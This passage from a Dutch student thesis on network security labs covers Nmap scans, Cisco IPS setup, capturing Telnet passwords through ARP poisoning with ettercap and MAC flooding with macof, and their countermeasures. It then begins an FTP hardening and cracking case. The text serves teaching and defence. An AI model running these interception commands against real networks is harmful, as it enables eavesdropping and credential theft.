Discovered open port 9002/tcp on 192.168.1.1

Discovered open port 2002/tcp on 192.168.1.1

Discovered open port 6002/tcp on 192.168.1.1

Completed SYN Stealth Scan at 16:10, 0.86s elapsed (1000 total ports)

Initiating Service scan at 16:10

Scanning 5 services on 192.168.1.1

Completed Service scan at 16:10, 0.02s elapsed (5 services on 1 host)

Initiating OS detection (try #1) against 192.168.1.1

NSE: Script scanning 192.168.1.1.

Initiating NSE at 16:10

Completed NSE at 16:11, 15.04s elapsed

Nmap scan report for 192.168.1.1

Host is up (0.00022s latency).

Not shown: 995 closed ports

PORT STATE SERVICE

23/tcp open telnet

2002/tcp open telnet

4002/tcp open tcpwrapped

6002/tcp open tcpwrapped

9002/tcp open tcpwrapped

MAC Address: 44:03:A7:5B:10:81 (Cisco)

OS details: Cisco 836, 890, 1751, 1841, 2800, or 2900 router (IOS 12.4 -

15.1), Cisco Aironet AIR-AP1141N WAP (IOS 12.4)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=262 (Good luck!)

IP ID Sequence Generation: Randomized

Service Info: OS: IOS; Device: router; CPE: cpe:/o:cisco:ios

TRACEROUTE

HOP RTT ADDRESS

1 0.22 ms 192.168.1.1

NSE: Script Post-scanning.

Read data files from: C:\Program Files (x86)\Nmap

Page 102: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

102

OS and Service detection performed. Please report any incorrect results at

http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 43.81 seconds

Raw packets sent: 1023 (45.806KB) | Rcvd: 1016 (40.938KB)

5.3 Stap 3: Intrusion Prevention System Een Intrusion Prevention System (IPS)

is een systeem waarmee je het

netwerkverkeer kan monitoren en

services mee kan blokkeren als ze door

de IPS komen. Een IPS is een toestel

waar al het netwerkverkeer door moet

vooraleer het verkeer het interne

netwerk zal bereiken.

Wij hebben een IPS ingesteld op de router van het interne netwerk.

5.3.1 Intrusion Prevention System instellen Om deze IPS in te stellen hebben we gebruik gemaakt van Cisco Configuration Professional (CCP).

CCP is een tool waarmee je vele zaken kan doen, van monitoring tot het instellen van

netwerkapparatuur. Wij hebben hiermee een IPS ingesteld.

5.3.1.1 CCP instellen

Om CCP te kunnen gebruiken moet je enkele zaken configureren op de toestellen dat je door CCP

wilt laten configureren.

Je moet een gebruiker aanmaken met “privilege level 15” en met een wachtwoord. Je moet dan

toelaten dat je apparaat kan gevonden worden door CCP, dit doe je met het commando “ip http

server”. Wat je ook moet configureren is dat als CCP een connectie wil opstellen met de router dat er

een lokale gebruikersnaam en wachtwoord moet ingegeven worden.

Commando’s om CCP te kunnen gebruiken:

en

conf t

Username <username> privilege <0-15> password 0 <passwoord>

Ip http server

Ip http authentication local

end

copy run start

Als CCP opgestart is moet je eerst je toestellen laten “discoveren”. Dit is de laatste stap in het proces.

Als dit lukt kan je de toestellen via CCP monitoren en aanpassen.

Page 103: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

103

5.3.1.2 IPS instellen en Signature aanpassen

Als CCP goed opgestart is, ga je naar de tab “Configure” en dan naar de map Security. In deze map

staat er Intrusion Prevention. Als je hierop klikt krijg je het volgende scherm.

Figuur 5-1 CCP Intrusion Prevention System

Op dit scherm moet je kiezen voor “Launch IP Role Wizard”, de wizard zal dan starten. Deze wizard

zal he helpen om een IPS te configureren.

Figuur 5-2 CCP Intrusion Prevention System

In dit scherm krijg je informatie over al de zaken die je zal moeten beslissen en die je zal moeten

invullen bij het instellen van een IPS.

Page 104: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

104

Figuur 5-3 CCP Intrusion Prevention System

Hier zal je moeten kiezen op welke interfaces de IPS ingesteld wordt. Je zal ook kiezen of hij moet

werken met verkeer dat binnenkomt op die interface of het verkeer dat naar buiten gaat. Door

inbound te kiezen bij beide interfaces laat je toe om het verkeer dat van het interne netwerk en van

het Internet komt te controleren.

Figuur 5-4 CCP Intrusion Prevention System

Page 105: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

105

In het venster van “Signature and Public key” klik je op de drie puntjes naast “signature file”. Een IPS

werkt met signatures, deze signatures zullen gebruikt worden om het verkeer na te kijken. Signatures

moet je via TFTP op de router plaatsen.

Figuur 5-5 CCP Intrusion Prevention System

Bij “Configure Public Key” zal je de naam en de Public Key zelf moeten ingeven.

Naam: realm-cisco.pub

Pubilc Key:

30820122 300D0609 2A864886 F70D0101 01050003 82010F00 3082010A 02820101

00C19E93 A8AF124A D6CC7A24 5097A975 206BE3A2 06FBA13F 6F12CB5B 4E441F16

17E630D5 C02AC252 912BE27F 37FDD9C8 11FC7AF7 DCDD81D9 43CDABC3 6007D128

B199ABCB D34ED0F9 085FADC1 359C189E F30AF10A C0EFB624 7E0764BF 3E53053E

5B2146A9 D7A5EDE3 0298AF03 DED7A5B8 9479039D 20F30663 9AC64B93 C0112A35

FE3F0C87 89BCB7BB 994AE74C FA9E481D F65875D6 85EAF974 6D9CC8E3 F0B08B85

50437722 FFBE85B9 5E4189FF CC189CB9 69C46F9C A84DFBA5 7A0AF99E AD768C36

006CF498 079F88F8 A3B3FB1F 9FB7B3CB 5539E1D1 9693CCBB 551F78D2 892356AE

2F56D826 8918EF3C 80CA4F4D 87BFCA3B BFF668E9 689782A5 CF31CB6E B4B094D3

F3020301 0001

Page 106: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

106

Figuur 5-6 CCP Intrusion Prevention System

In het volgende scherm klik je op de drie puntjes die naast “Config Location” staan. Dan krijg je dit

scherm. In dit scherm zal je beslissen op welke plaats op de router je de signature wil opslaan.

Figuur 5-7 CCP Intrusion Prevention System

Bij “Chose Category” kies je voor “basic”, we kiezen hiervoor omdat we de IPS minder lang duurt om

te implementeren en het vergt minder CPU gebruik en flash memory van de router.

Page 107: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

107

Figuur 5-8 CCP Intrusion Prevention System

Als volgt krijg je een overzicht van al de commando’s die je anders manueel zou moeten toepassen

op de router.

Figuur 5-9 CCP Intrusion Prevention System

In dit overzicht kan je zien op welke interface in welke richting de IPS geactiveerd is.

Page 108: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

108

Figuur 5-10 CCP Intrusion Prevention System

Dit is een overzicht van de beschikbare signatures. Zoals je kan zien zijn er al signatures die

automatisch aanstaan en enkele die nog niet aan staan.

Figuur 5-11 CCP Intrusion Prevention System

We zullen een nieuwe signature definiëren en die dan uittesten. We zullen de signature toepassen

die ICMP Echo Requests zal kunnen identificeren.

Page 109: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

109

Figuur 5-12 CCP Intrusion Prevention System

We hebben deze signature aangezet en als volgt hebben we met de rechtermuisklik geklikt op de

signature. In dat menu dat verschijnt kies je voor “Actions…”.

Figuur 5-13 CCP Intrusion Prevention System

Bij actions kan je kiezen wat er gebeurt als er aan de signature voldaan wordt.

Wij hebben ervoor gekozen om de aanvaller tegen te houden, een alert te produceren en de TCP

connectie te resetten. Hierdoor zal de ICMP Echo Request tegengehouden worden door de IPS.

Page 110: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

110

Figuur 5-14 CCP Intrusion Prevention System

Als al het vorige gedaan is klik je op “Apply Changes”, normaal zou er nu bij “Enabled” een vinkje

moeten staat. Hiermee weet je dat je je signature goed ingesteld hebt.

5.3.1.3 Logging van de IPS instellen

Als je je signature configureert kan je kiezen om een alert te genereren. Je kan ook configureren dat

die alert naar je computer wordt gestuurd.

Om logging in te stellen ga je naar de Configure tab. Dan ga je naar router en als volgt kies je voor

logging. Je zou een scherm moeten krijgen als deze:

Figuur 5-15 CCP Intrusion Prevention System

Page 111: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

111

Hierbij zal je kiezen om de logberichten door te sturen naar de computer met het IP-adres

192.168.1.1. En dit van al de berichten tot op het niveau van debugging. In een echte omgeving

wordt die meestal niet gedaan, omdat het dan echt wel veel berichten zijn, die naar je computer

gestuurd worden. Dit zorgt voor extra belasting in het netwerk.

5.3.1.4 IPS uittesten

Als laatste zullen we de IPS uittesten en zien of deze de ICMP Requests tegen houdt. Dit zullen we

doen door de router waar de IPS op geïnstalleerd staat te pingen.

Commando:

ping 192.168.1.1

Resultaat:

In CCP kan je enkele statistieken nagaan dat je meer uitleg geven over hoe de IPS functioneert.

Figuur 5-16 CCP Intrusion Prevention System

Zoals te zien is zijn er 8 ICMP Echo requests doorgestuurd naar de IPS. Je kan zien dat de “source IP

Address” 192.168.3.3:8 is, dit is omdat een Echo-request verstuurd wordt op ICMP poort 8 en

toekomt op ICMP poort 0.

Hierna hebben we met Nmap een intense scan uitgevoerd om na te gaan dat dit nog andere

signatures zou triggeren.

Page 112: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

112

Figuur 5-17 CCP Intrusion Prevention System

Zoals te zien is, zijn er door de Intense Nmap scan ook de signatures voor een TCP SYN/FIN pakket en

TCP NULL pakket getriggerd. Omdat er hiervoor enkel het event “procedure-alert” gekozen is zal dit

pakket wel doorgelaten worden maar er zal wel een alert gegenereerd worden.

6 Conclusie Er zijn vele verschillende soorten scannen beschikbaar die je in een netwerk kan uitvoeren. Om

ervoor te zorgen dat deze scans geen resultaat opleveren kan je als netwerkbeheerder een IPS

instellen. Met deze IPS kan je dus al het verkeer filteren en dus ook al het slechte verkeer er uit

halen.

Er zijn wel enkele zaken waar je rekening moet mee houden. Er zijn applicaties die ICMP Echo

requests nodig hebben om te kunnen functioneren. Dus vooraleer je een IPS instelt moet je nagaan

welke noden er zijn in je netwerk en dan een gulden middenweg kiezen tussen de beveiliging en de

functionaliteit.

Page 113: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

113

Case 2: Netwerkverkeer afluisteren 1 Inleiding In veel bedrijven heb je de mogelijkheid om je laptop mee te nemen in een vergaderzaal. Als je dan

even alleen gelaten wordt en er is niemand die let op jou, zou je kunnen binnenbreken in de

netwerktoestellen door netwerkverkeer af te luisteren. Welbepaald het Telnet protocol.

Telnet is een protocol dat je als netwerkadministrator beter niet gebruikt omdat, alles wat je intypt in

je Telnet-sessie in niet geëncrypteerd tekst doorstuurt. Je zou als hacker dus alles kunnen lezen wat

er getypt wordt, als je de verbinding afluistert. De pakketten zullen wel enkel te zien zijn op het

toestel dat de pakketten verstuurd en op het toestel dat de pakketten ontvangt. Als jij de pakketten

toch wilt kunnen ontvangen kan je twee zaken doen:

MAC table flooding

ARP poisoning

Deze twee manieren zullen verder in deze case besproken worden.

2 Topologie Diagram De topologie die hieronder volgt is een logische topologie zoals die in een echt netwerk kan zijn. De

HoofdRouter is verbonden met de HoofdSwitch. Waarna de HoofdSwitch in verbinding zal staan met

de afzonderlijke switches waar dan de toestellen aan verbonden zijn.

Figuur 2-1 Logische topologie

Page 114: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

114

3 IP Adressen Tabel In de volgende tabel vindt u een overzicht van hoe de toestellen verbonden zijn met elkaar en welke

IP-adressen ze gekregen hebben. De HoofdRouter is een DHCP server.

Uitleg bij de afkortingen:

VS: VergaderzaalSwitch

HS: HoofdSwitch

AS: AdministratorSwitch

NA: NetwerkAdministrator

Toestel Interface IP-adres Subnet Mask Default Gateway

Switchport

HoofdRouter Gig0/0 Aangeleerd via DHCP

Gig0/1 192.168.1.1 255.255.255.0 / HS Gig0/1

Hoofdswitch / / / / /

VS / / / / HS fa0/1

AS / / / / HS fa0/2

Hacker NIC DHCP 192.168.1.3

255.255.255.0 192.168.1.1 VS fa0/1

NA NIC DHCP 192.168.1.2

255.255.255.0 192.168.1.1 AS fa/01

4 Objectieven Testnetwerk maken

Netwerk scannen

ARP poisoning toepassen en Telnet pakketten afluisteren

MAC table flooding toepassen en Telnet pakketten afluisteren

5 Stappenplan In dit stappenplan zal besproken worden hoe je het netwerk kan opstellen waar de aanval op

uitgevoerd word. Er zal ook besproken worden hoe je ARP poisoning kan toepassen en hierdoor de

Telnet pakketten kan afluisteren. Als laatste zal MAC table flooding uitgelegd worden en hoe dit je

kan helpen om de Telnet pakketten kan afluisteren.

5.1 Stap 1: Testnetwerk opstellen en uittesten Om het testnetwerk op te stellen zal je een DHCP server moeten configureren en IP-adressen

instellen op de HoofdRouter. Je zal ook een default-route moeten instellen op de HoofdRouter zodat

al de pakketten die de HoofdRouter ontvangt en die niet bestemd zijn voor de HoofdRouter zelf,

doorgestuurd worden naar hun bestemming op het internet.

Om het testnetwerk uit te testen kan je een ping naar de HoofdRouter uitvoeren van één van de

toestellen die via DHCP een IP-adres zouden moeten krijgen.

Page 115: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

115

5.1.1 IP-adressen en een default-route instellen op de HoofdRouter Om ervoor te zorgen dat de HoofdRouter kan gebruikt worden om te beheren via Telnet zal je een IP-

adres moeten instellen op de HoofdRouter. Je zal hiervoor ook een console, enable en Telnet

wachtwoord moeten instellen.

Commando’s om een IP-adres in te stellen:

enable

conf t

hostname R1

interface gig 0/0

ip address dhcp

no shutdown

interface gig 0/1

ip address 192.168.1.1 255.255.255.0

no shutdown

end

copy run start

Commando’s om een console, enable en Telnet wachtwoord in te stellen:

enable

conf t

enable secret cisco123

line console 0

password ciscoconpass

exit

line vty 0 4

password cisco

exec-timeout 0 5

end

copy run start

Commando’s om een default route in te stellen:

enable

conf t

ip route 0.0.0.0 0.0.0.0 gig 0/0

end

copy run start

5.1.2 DHCP server configureren Een DHCP server is een server die IP-adressen zal toewijzen aan de toestellen die in je netwerk

aanwezig zijn.

Commando’s om een DHCP server in te stellen:

enable

conf t

ip dhcp pool DHCP

network 192.168.1.0

default-router 192.168.1.1

exit

ip dhcp excluded-address 192.168.1.1

end

copy run start

Page 116: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

116

5.1.3 Testnetwerk uittesten Om na te gaan dat je DHCP server werkt kan je op de HoofdRouter het commando sh ip dhcp

binding uitvoeren, dit commando zal je laten zijn hoeveel en aan wie hij IP-adressen uitgedeeld

heeft. Om het testnetwerk uit te testen kan je eerst nakijken of je een IP-adres gekregen hebt van de

DHCP server. Als volgt kan je een ping uitvoeren naar de HoofdRouter om na te gaan dat je connectie

hebt met de HoofdRouter.

Commando op de HoofdRouter om na te gaan aan wie hij welke IP-adressen heeft uitgedeeld:

sh ip dhcp binding

Resultaat:

Figuur 5-1 Commando sh ip dhcp binding

Commando om na te gaan dat je een IP-adres gekregen hebt:

ipconfig

Resultaat:

Figuur 5-2 Commando ipconfig

Commando om na te gaan dat je connectie hebt met de HoofdRouter:

ping 192.168.1.1

Resultaat:

Figuur 5-3 Commando ping 192.168.1.1

Als dit allemaal in orde is, kunnen we overgaan naar stap 2. Als dit niet in orde is moet je je

configuratie op de HoofdRouter nakijken met het commando show running config.

Page 117: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

117

5.2 Stap 2: Netwerk scannen Als je je connecteert met het netwerk en je wil weten op welke apparaten er Telnet aanstaat, dus op

welk toestel Telnet geconfigureerd staat, kan je een poortscan uitvoeren. Deze poortscan kan je

uitvoeren met Nmap. Meer informatie over poortscans kan je terugvinden in de bijlage Scanning.

Als je het resultaat van de poortscan analyseert kan je hieruit afleiden dat er zich een router bevindt

achter het IP-adres 192.168.1.1, op deze router is poort 23 open. Dit is de poort dat Telnet gebruikt

voor de communicatie. Achter het IP-adres 192.168.1.2 bevindt zich een Dell computer. Het IP-adres

192.168.1.3 is je eigen computer.

Commando om een poortscan uit te voeren met Nmap:

nmap –sS 192.168.1.0/24

Resultaat:

Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-21 14:12 Romance Standard

Time

Nmap scan report for 192.168.1.1

Host is up (0.021s latency).

Not shown: 994 closed ports

PORT STATE SERVICE

23/tcp open telnet

80/tcp open http

443/tcp open https

992/tcp open telnets

8080/tcp open http-proxy

8443/tcp open https-alt

MAC Address: 7C:03:D8:C2:31:B8 (unknwown)

Nmap scan report for 192.168.1.2

Host is up (0.0060s latency).

All 1000 scanned ports on 192.168.1.2 are closed

MAC Address: 24:B6:FD:4E:6F:BF (Dell)

Nmap scan report for 192.168.1.3

Host is up (0.0060s latency).

All 1000 scanned ports on 192.168.1.3 are closed

MAC Address: B8:27:EB:3C:05:97 (unknown)

Nmap done: 256 IP addresses (6 hosts up) scanned in 36.97 seconds

Page 118: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

118

5.3 Stap 3: ARP poisoning toepassen en Telnet verkeer afluisteren De pakketten die via Telnet verstuurd worden kunnen enkel gezien worden op de computer die de

pakketten verzendt en het toestel die ze ontvangt. In dit geval is het de NetwerkAdministrator die de

pakketten zal versturen en de HoofdRouter die ze zal ontvangen. Door ARP poisoning toe te passen

kan je al het verkeer dat van de NetwerkAdministrator naar de HoofdRouter stuurt, omleiden via uw

eigen toestel. Hierdoor kan je de pakketten van Telnet afluisteren.

5.3.1 ARP Poisoning Bij ARP poisoning gebruik je het ARP protocol om op die manier al de gegevens via jouw toestel om

te leiden. Dit gebeurt in 3 stappen.

Eerst zal je een ARP reply sturen naar de router om zo de router te doen geloven dat jij de

netwerkadministrator bent.

Ten tweede stuur je een ARP reply naar de computer van de netwerkadministrator om aan

zijn computer te laten geloven dat jij de router bent.

Als laatste maak je gebruik van IP forwarding. Hierdoor zal al het verkeer dat voorbij je

toestel passeert naar de router doorgestuurd worden, waardoor de netwerk administrator

niet weet dat er afgeluisterd wordt.

Figuur 5-4 ARP-poisoning

bron: http://www.watchguard.com/infocenter/editorial/135324.asp,

http://www.watchguard.com/archive/files/images/ARPpoison3.jpg

Page 119: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

119

5.3.2 ARP Poisoning met Ettercap Om de ARP poison aanval uit te voeren kan je de tool Ettercap gebruiken. Dit is een tool die je toelaat

om aan ARP poisoning te doen en daarna de netwerkverbinding af te luisteren. Ettercap laat ook toe

om daarna de verbinding tussen de netwerk administrator en de hoofdrouter te herstellen.

Commando om ettercap te starten: ettercap –T –M arp:remote /192.168.1.1/ /192.168.1.2/

Resultaat:

Figuur 5-5 Opstarten van ettercap

Hierna zullen de pakketten die van de netwerk administrator naar de hoofdrouter gaan en

omgekeerd beginnen te verschijnen. Door de volgende stroom van pakketten te analyseren kan je

afleiden dat het enable wachtwoord cisco123 is. Dit kan je weten omdat er “Password:” staat en

eens dat ingegeven is staat er “R#” wat wil zeggen dat het enable wachtwoord de juiste is.

Page 120: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

120

Figuur 5-6 Pakketten vergreken met ettercap

Page 121: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

121

5.4 Stap 4: MAC table flooding MAC table flooding is een andere manier om al het netwerkverkeer af te luisteren. Door MAC table

flooding toe te passen zorg je ervoor dat een switch zal opereren als een HUB waardoor deze al de

pakketten die hij ontvangt zal broadcasten over het netwerk.

Een switch weet aan de hand van het MAC-adres naar waar hij de pakketten moet sturen. Een switch

zal al de aangeleerde MAC-adressen bijhouden in een MAC-table. Als hacker zal je proberen deze

MAC-table vol te steken met MAC-adressen waardoor de switch al de pakketten die hij ontvangt zal

broadcasten op al de poorten. Hierdoor ontvang je als hacker ook het gewenste Telnet verkeer.

We hebben dit uitgetest op een 2960 cisco switch en dit is niet

gelukt omdat deze switch niet toelaat dat zijn MAC-table helemaal

vol loopt. Hij zal altijd 40 adressen overhouden en hij zal geen

nieuwe adressen meer aanleren.

Het commando macof zal heel rap honderden mac-adressen doorsturen naar de switch.

Commando voor MAC-adressen in switch te steken:

macof

Resultaat:

Page 122: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

122

6 Tegenmaatregel tegen afluisteren van het netwerk Er zijn drie maatregelen die je kan nemen om ervoor te zorgen dat de methodes van hiervoor niet

uitgevoerd kunnen worden.

6.1 Switchport port security Je kan switchport security instellen en ervoor zorgen dat er maar een maximum aantal MAC-

adressen aangeleerd kunnen worden op één switchpoort.

Met de volgende commando’s stel je in dat er een maximum van 10 MAC-adressen per poort

aangeleerd kunnen worden. Als het deze 10 poorten probeert te overschrijden dan zal er een SNMP

bericht naar de netwerk administrator gestuurd worden waardoor deze automatisch op de hoogte

gebracht wordt van de situatie.

Commando’s om switchport security in te stellen:

enable

conf t

interface fa0/1

switchport port-security

switchport port-security maximum 10

switchport port-security restrict

end

copy run start

6.2 Dynamic ARP-inspection Je kan dynamic ARP-inspection instellen, dit zal de MAC-adressen mappen aan een IP-adres. Hierdoor

zullen de reply’s die je stuurt om aan ARP-poisoning te doen niet doorgelaten worden en dus hun

eindbestemming niet bereiken.

Om dynamic ARP-inspection toe te passen zal je moeten werken met VLAN’s, je zal dan per VLAN

deze inspectie instellen. De link tussen de switches zet je op trust zodat die ARP-pakketten niet

gecontroleerd worden.

Commando’s om dynamic arp-inspection in te stellen:

enable

conf t

ip arp inspection <vlan nummer>

interface gig0/1

ip arp inspection trust

end

copy run start

Bron:

http://www.cisco.com/en/US/docs/switches/lan/catalyst3550/software/release/12.2_25_see/config

uration/guide/swdynarp.html

Page 123: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

123

6.3 SSH in plaats van Telnet Telnet is een protocol dat je beter niet meer gebruikt, er zijn andere alternatieven zoals SSH die de

pakketten zal encrypteren voordat deze op het netwerk gestuurd worden.

Om SSH in te stellen zal je eerst een hostname en een domain-name moeten instellen. Je zal dit

moeten doen omdat beide gebruikt worden bij het genereren van de keys. Deze keys worden

gebruikt bij het encrypteren van de pakketten. Als volgt moet je de keys aanmaken. Ten laatste zorg

je ervoor dat enkel SSH toegelaten wordt voor remote access.

Commando’s om SSH in te stellen:

enable

conf t

hostname HoofdRouter

ip domain-name hoofdrouter.cisco.com

crypto key generate rsa

line vty 0 4

transport input ssh

end

copy run start

7 Conclusie Als een hacker echt wil, zal hij zo goed als altijd wel een manier vinden om je netwerk af te luisteren.

Hierdoor is het aangeraden om ervoor te zorgen dat je altijd encryptie gebruikt om de pakketten op

je netwerk te encrypteren.

Telnet is een onveilig protocol dat eigenlijk niet meer zou mogen gebruikt worden. In plaats hiervan

zou je altijd SSH moeten gebruiken omdat er bij SSH encryptie gebeurt. Als er dan toch iemand in

slaagt om verkeer op je netwerk af te luisteren dan kan hij niets doen met die pakketten omdat deze

geëncrypteerd zijn.

Page 124: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

124

Page 125: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

125

Case 3: FTP beheren en aanvallen 1 Inleiding FTP (File Transfer Protocol)-servers worden in bedrijven vaak gebruikt om bestanden te delen, die

tevens extern kunnen geraadpleegd worden. De taak van een netwerkbeheerder is om de FTP-server

toegankelijk te maken voor werknemers, en tegelijk de veiligheid te bewaren zodat onbevoegde

personen de server niet kunnen binnendringen.

De manier waarop dit gedaan wordt is door bepaalde configuraties te maken waardor we accounts

verkrijgen, die daarna door bepaalde gebruikers kunnen gebruikt worden en deze te beveiligen met

een wachtwoord.

2 Benodigdheden Toestel IP-adres

FTP server 192.168.0.121/24

FTP client 192.168.0.221/24

2.1 FTP server Hiervoor gebruiken we een VirtualBox met Linux Mint versie 2.6/3.x.

De software die we gaan gebruiken noemt "vsftpd" en is een standaard geworden voor Linux FTP

servers.

2.2 FTP client Om de toegang te vergemakkelijken gebruiken we geen FTP client software, maar een normale

webbrowser zoals Mozilla Firefox voor Linux. We behouden de VirtualBox met Linux Mint versie

2.6/3.x

3 Objectieven 1. FTP server installeren en configureren

2. FTP server configureren voor anonieme toegang

3. Logging inschakelen

4. Server proberen kraken

5. Conclusies trekken

6. Anonieme toegang uitschakelen en accounts aanmaken

7. Server proberen kraken

8. Conclusies trekken

Page 126: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

126

4 Stappenplan In dit stappenplan zal besproken worden hoe een FTP server kan geconfigureerd en geraadpleegd

worden. Daarnaast bekijken we ook de verschillende gradaties van veiligheid dat men kan instellen

op een FTP server en welke mogelijkheden er bestaan om een FTP server te kraken. De pogingen

worden zo goed mogelijk in de gaten gehouden door alles te loggen.

1. FTP server installeren en configureren

Eerst en vooral worden we "superuser" door het commando su in te geven zonder extra

parameters. Nadat we het wachtwoord hebben ingegeven kunnen we de vsftpd package

installeren m.b.v. het apt-get install vsftpd commando.

Vervolgens gaan we naar het configuratiebestand voor vsftpd om te kijken wat we allemaal kunnen

configureren. vim is een tekstverwerker dat toelaat bestanden te openen en aan te passen. Het

bestand dat we willen aanpassen bevind zich in de /etc/ folder bij alle andere

configuratiebestanden onder de naam vsftpd.conf.

Hieronder bespreken we wat we gaan configureren en waarvoor alles dient. De drie puntjes (...) is

waar tekst is weggelaten die onnodig is voor deze case.

# Example config file /etc/vsftpd.conf

...

# Run standalone? vsftpd can run either from an inetd or as a standalone

# daemon started from an initscript.

listen=YES

...

Hier zeggen we dat we de vsftpd daemon als intiscript starten. Wat dit wil zeggen is dat de FTP

server opgestart wordt van zodra het systeem is opgestart. We stellen dit in zodat we zeker weten

dat de FTP server zal opstarten.

Page 127: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

127

...

# Make sure PORT transfer connections originate from port 20 (ftp-data).

connect_from_port_20=YES

...

Er moet opgemerkt worden dat het nodig is om routers in te stellen zodat ze aan port forwarding

doen op poort 20 en 21 (TCP), anders kan het IP-adres van de server niet geforward worden.

# It is recommended that you define on your system a unique user which the

# ftp server can use as a totally isolated and unprivileged user.

nopriv_user=ftpsecure

Om toch enigszins volgens een standaard te werken, is het best om een geïsoleerde gebruiker aan te

maken zonder rechten dat de FTP server kan gebruiken. In dit voorbeeld maken we de gebruiker

ftpsecure aan door het commando useradd te gebruiken.

Vervolgens geven we hem een wachtwoord met passwd, anders zal de gebruiker niet kunnen

gebruikt worden.

...

# You may fully customise the login banner string:

ftpd_banner=Welcome to FTP test service.

...

Voor de volledigheid veranderen we ook de banner die een gebruiker ziet eenmaal hij ingelogd is.

2. FTP server configureren voor anonieme toegang ...

# Allow anonymous FTP? (Disabled by default)

anonymous_enable=YES

...

Ook deze optie stellen we in om te kijken of we de server kunnen bereiken en welke gevaren er

schuilen bij het inschakelen van deze optie. Als we echter via een webbrowser anoniem proberen in

te loggen krijgen we nog steeds een fout. Dit is omdat webbrowsers onnodig twee maal controleren

of er een wachtwoord vereist is.

Page 128: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

128

Normaal zou dit scherm niet mogen verschijnen als anonieme login ingeschakeld staat

Om dit te omzeilen gebruiken we een optie die niet in de standaardconfiguratie aanwezig is.

...

no_anon_password=YES

...

Dit zorgt ervoor dat er ook met webbrowsers anoniem kan worden ingelogd.

...

# Uncomment this to allow local users to log in.

local_enable=NO

...

We zetten voorlopig de mogelijkheid om in te loggen met lokale accounts uit, omdat we eerst

anoniem gaan inloggen.

...

# Uncomment this to allow the anonymous FTP user to upload files. This only

# has an effect if the above global write enable is activated. Also, you
